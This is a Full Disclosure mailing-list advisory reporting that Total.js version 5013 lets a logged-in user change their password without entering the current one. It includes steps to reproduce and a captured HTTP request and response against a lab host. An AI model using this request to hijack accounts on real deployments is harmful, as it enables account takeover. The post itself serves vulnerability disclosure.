Current Password not Required When Changing Password - totaljsv5013

[Andrey Stoykov <mwebsec () gmail com>]

# Exploit Title: Current Password not Required When Changing Password -
totaljsv5013
# Date: 10/2025
# Exploit Author: Andrey Stoykov
# Version: 5013
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-43-current.html


Current Password not Required When Changing Password:

Steps to Reproduce:
1. Login with user and click on profile icon
2. Select "Change Credentials"
3. The user would not be required to enter current password for updating
the current password


// HTTP POST Request - Changing Password

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

{"schema":"admin_save","data":{"name":"John
Connor","login":"gz82g8WYq3","password":"Passw0rd!"}}


// HTTP Response - Changing Password

HTTP/1.1 200 OK
set-cookie:
NPgdS=13030-39383d41540751460a15064b0f7449766a261756481745550d1f5f05414b061f5e6456343a630323750702160307415f584656405e390e3e38360e591d471c0619711511121d111f4f3a023530306156510b014f0d5045;
Expires=Wed, 26 Nov 2025 16:25:39 GMT; Path=/; SameSite=Lax
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:25:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 16

{"success":true}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/